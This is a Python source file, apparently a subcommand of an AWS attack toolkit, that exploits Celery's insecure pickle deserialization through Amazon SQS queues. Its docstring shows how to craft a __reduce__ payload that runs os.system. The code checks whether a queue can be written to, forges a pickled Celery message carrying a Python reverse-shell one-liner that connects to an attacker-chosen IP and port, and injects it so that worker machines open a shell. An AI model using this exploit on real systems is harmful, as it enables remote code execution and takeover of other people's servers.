'''
This comment holds the basics behind the exploit. Don't remove!

In the SQS queue we'll find a message holding this information:

eyJib2R5IjogImdBSjljUUVvVlFkbGVIQnBjbVZ6Y1FKT1ZRTjFkR054QTRoVkJHRnlaM054QkZnZE
FBQUFhSFIwY0RvdkwyaDBkSEJpYVc0dWIzSm5MM1Z6WlhJdFlXZGxiblJ4QllWeEJsVUZZMmh2Y21S
eEIwNVZDV05oYkd4aVlXTnJjM0VJVGxVSVpYSnlZbUZqYTNOeENVNVZCM1JoYzJ0elpYUnhDazVWQW
1sa2NRdFZKREF4TXpKa05XRm1MV1JtWVdZdE5ESXlOUzA1TURKbExXTmhNR1ZpT0RneVptVmlaSEVN
VlFkeVpYUnlhV1Z6Y1ExTEFGVUVkR0Z6YTNFT1ZSTndjbTk0ZVM1MFlYTnJjeTVzYjJkZmRYSnNjUT
lWQTJWMFlYRVFUbFVHYTNkaGNtZHpjUkY5Y1JKMUxnPT0iLCAiaGVhZGVycyI6IHt9LCAiY29udGVu
dC10eXBlIjogImFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZSIsICJwcm9wZXJ0aWVzIjogey
Jib2R5X2VuY29kaW5nIjogImJhc2U2NCIsICJkZWxpdmVyeV9pbmZvIjogeyJwcmlvcml0eSI6IDAs
ICJyb3V0aW5nX2tleSI6ICJjZWxlcnkiLCAiZXhjaGFuZ2UiOiAiY2VsZXJ5In0sICJkZWxpdmVyeV
9tb2RlIjogMiwgImRlbGl2ZXJ5X3RhZyI6ICI2MTlhMjA4Ny05Mjg1LTQzNGYtYTlkNC02ZDM2ZGNi
NzJkNjcifSwgImNvbnRlbnQtZW5jb2RpbmciOiAiYmluYXJ5In0

After one base64 decode we get the following information:

{"body": "gAJ9cQEoVQdleHBpcmVzcQJOVQN1dGNxA4hVBGFyZ3NxBFgdAAAAaHR0cDovL2h0dHBi
          aW4ub3JnL3VzZXItYWdlbnRxBYVxBlUFY2hvcmRxB05VCWNhbGxiYWNrc3EITlUIZXJy
          YmFja3NxCU5VB3Rhc2tzZXRxCk5VAmlkcQtVJDAxMzJkNWFmLWRmYWYtNDIyNS05MDJl
          LWNhMGViODgyZmViZHEMVQdyZXRyaWVzcQ1LAFUEdGFza3EOVRNwcm94eS50YXNrcy5s
          b2dfdXJscQ9VA2V0YXEQTlUGa3dhcmdzcRF9cRJ1Lg==",
 "headers": {}, "content-type": "application/x-python-serialize", 
 "properties": {"body_encoding": "base64",
                "delivery_info": {"priority": 0,
                                  "routing_key": "celery",
                                  "exchange": "celery"},
                "delivery_mode": 2,
                "delivery_tag": "619a2087-9285-434f-a9d4-6d36dcb72d67"},
 "content-encoding": "binary"}

Base64 decoding the body we get:

\x80\x02}q\x01(U\x07expiresq\x02NU\x03utcq\x03\x88U\x04argsq\x04X\x1d\x00\x00
\x00http://httpbin.org/user-agentq\x05\x85q\x06U\x05chordq\x07NU\tcallbacksq
\x08NU\x08errbacksq\tNU\x07tasksetq\nNU\x02idq\x0bU$0132d5af-dfaf-4225-902e-
ca0eb882febdq\x0cU\x07retriesq\rK\x00U\x04taskq\x0eU\x13proxy.tasks.log_urlq\x0f
U\x03etaq\x10NU\x06kwargsq\x11}q\x12u.

Which when unpickled is:

>>> pickle.loads('\x80\x02}q\x01(U\x07expiresq\x02NU\x03utcq\x03\x88U\x04argsq
                  \x04X\x1d\x00\x00\x00http://httpbin.org/user-agentq\x05\x85q
                  \x06U\x05chordq\x07NU\tcallbacksq\x08NU\x08errbacksq\tNU\x07
                  tasksetq\nNU\x02idq\x0bU$0132d5af-dfaf-4225-902e-ca0eb882feb
                  dq\x0cU\x07retriesq\rK\x00U\x04taskq\x0eU\x13proxy.tasks.log
                  _urlq\x0fU\x03etaq\x10NU\x06kwargsq\x11}q\x12u.')

{'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
 'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
 'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
 'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd'}

So, if we want to create a body that is valid but when decoded will run an
arbitrary command, we can use the following:

import pickle
import os
 
class RunCmd(object):
  def __reduce__(self):
    return (os.system, ('/bin/ls',))

data = {'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
        'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
        'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
        'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd',
        'payload':RunCmd()}

raw = pickle.dumps(data)
pickle.loads(raw) # /bin/ls is run
'''

import base64
import pickle
import os
import json
import logging
import sys

import boto.sqs

from boto.sqs.connection import SQSConnection
from boto.sqs.message import Message

from core.common_arguments import add_region_arguments, add_credential_arguments


def is_vulnerable_sqs_queue(queue):
    '''
    Analyze the SQS queue and return True if:
        * Celery is used
        * The serialization is the default (python pickle)
        * SQS queue is empty
    
    The last item in the list seems strange, but in many cases it's NOT
    possible to determine if something is vulnerable because the workers
    consume the messages very fast and we can't find any messages, ever.
    '''
    try:
        messages = queue.get_messages(1)
    except Exception, e:
        logging.critical('Failed to read messages from SQS queue: "%s"' % e.error_message)
        sys.exit(1)
    else:
        if messages == []:
            # See docstring for more info about this case
            return True
        
        body = messages[0].get_body()
        return is_celery_message(body)
    
def is_celery_message(message_body):
    '''
    :return: True if this is a celery message
    '''
    try:
        json_decoded = json.loads(message_body)
        assert 'body' in json_decoded
        assert 'content-encoding' in json_decoded
    except:
        return False
    
    return True

def can_write_to_sqs(queue):
    '''
    :return: True if I can write to the SQS queue with :queue_name:
    '''
    m = Message()
    m.set_body('The test message')
    
    try:
        status = queue.write(m)
    except Exception, e:
        logging.critical('Failed to write a message to SQS queue: "%s"' % e.error_message)
        return False
    
    return True

def send_payload_to_sqs(queue, command):
    '''
    :return: True if the payload was successfully sent
    '''
    sqs_message_body = generate_sqs_message(command)
    
    m = Message()
    m.set_body(sqs_message_body)
    status = queue.write(m)
    
    logging.debug('Sent payload to SQS, wait for the reverse connection!')
    
    return status

def generate_sqs_message(command):
    '''
    :return: A string with the message to send to the SQS queue
    '''
    MESSAGE = {"body": None,
               "headers": {}, "content-type": "application/x-python-serialize", 
               "properties": {"body_encoding": "base64",
                              "delivery_info": {"priority": 0,
                                                "routing_key": "celery",
                                                "exchange": "celery"},
                              "delivery_mode": 2,
                              "delivery_tag": "619a2087-9285-434f-a9d4-6d36dcb72d67"},
               "content-encoding": "binary"}
    
    BODY = {'utc': True, 'chord': None, 'args': (u'http://httpbin.org/user-agent',),
            'retries': 0, 'expires': None, 'task': 'proxy.tasks.log_url',
            'callbacks': None, 'errbacks': None, 'taskset': None, 'kwargs': {},
            'eta': None, 'id': '0132d5af-dfaf-4225-902e-ca0eb882febd'}
    
    class RunCmd(object):
        def __init__(self, command):
            self.command = command
            
        def __reduce__(self):
            return (os.system, (self.command,))
        
    BODY['payload'] = RunCmd(command)
    
    raw_body = pickle.dumps(BODY)
    body_64 = base64.encodestring(raw_body)
    
    MESSAGE['body'] = body_64
    json_message = json.dumps(MESSAGE)
    
    return json_message

def exploit_celery_pickle(conn, queue, ip_address, port, cmd_args):
    '''
    Main entry point for the exploit command.
    
    :param conn: The SQS connection to the specified region
    :param queue: The SQS queue instance as returned by boto
    '''
    if not is_vulnerable_sqs_queue(queue):
        logging.debug('SQS queue %s is not vulnerable' % queue.name)
        return
    
    logging.debug('SQS queue %s is vulnerable' % queue.name)
    
    if not can_write_to_sqs(queue):
        logging.debug('We can NOT write to the SQS queue.')
        return
    
    logging.debug('We can write to the SQS queue.')
    
    msg = 'Start a netcat to listen for connections at %s and press enter.'
    logging.info(msg % cmd_args.reverse)
    raw_input()

    command = reverse_shell(ip_address, port)
    send_payload_to_sqs(queue, command)

REVERSE_SHELL = """\
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'"""

def reverse_shell(ip_address, port):
    cmd = REVERSE_SHELL.replace('\n', '')
    return cmd % (ip_address, port)

def cmd_arguments(subparsers):
    #
    # celery-pickle-exploit subcommand help
    #
    _help = 'Exploit unpickle vulnerability in Celery'
    parser = subparsers.add_parser('celery-pickle-exploit', help=_help)
    
    _help = 'Run a payload that will create a reverse shell. Example:'\
            ' --reverse=1.2.3.4:4000'
    parser.add_argument('--reverse', help=_help, required=True)

    _help = 'SQS queue name where raw message will be injected.'
    parser.add_argument('--queue-name', help=_help, required=True)

    add_region_arguments(parser)
    add_credential_arguments(parser)

    return subparsers

def cmd_handler(args):
    '''
    Main entry point for the sub-command.
    
    :param args: The command line arguments as parsed by argparse
    '''
    logging.debug('Starting celery-exploit')
    
    try:
        ip_address, port = args.reverse.split(':')
        port = int(port)
    except:
        logging.warn('Invalid reverse connection specification')
        sys.exit(1)
    
    region_info = get_region_from_name(args.region)
    
    try:
        conn = SQSConnection(region=region_info,
                             aws_access_key_id=args.access_key,
                             aws_secret_access_key=args.secret_key,
                             security_token=args.token)
    except Exception, e:
        logging.critical('Failed to connect to SQS: "%s"' % e.error_message)
        sys.exit(1)
    
    try:
        queue = conn.get_queue(args.queue_name)
    except Exception, e:
        logging.critical('Failed to get SQS queue in the specified region: "%s"' % e.error_message)
        sys.exit(1)
    
    exploit_celery_pickle(conn, queue, ip_address, port, args)

def get_region_from_name(region_name):
    for region_info in boto.sqs.regions():
        if region_info.name == region_name:
            return region_info
    
    else:
        logging.critical('No SQS region with name "%s"' % region_name)
        sys.exit(1)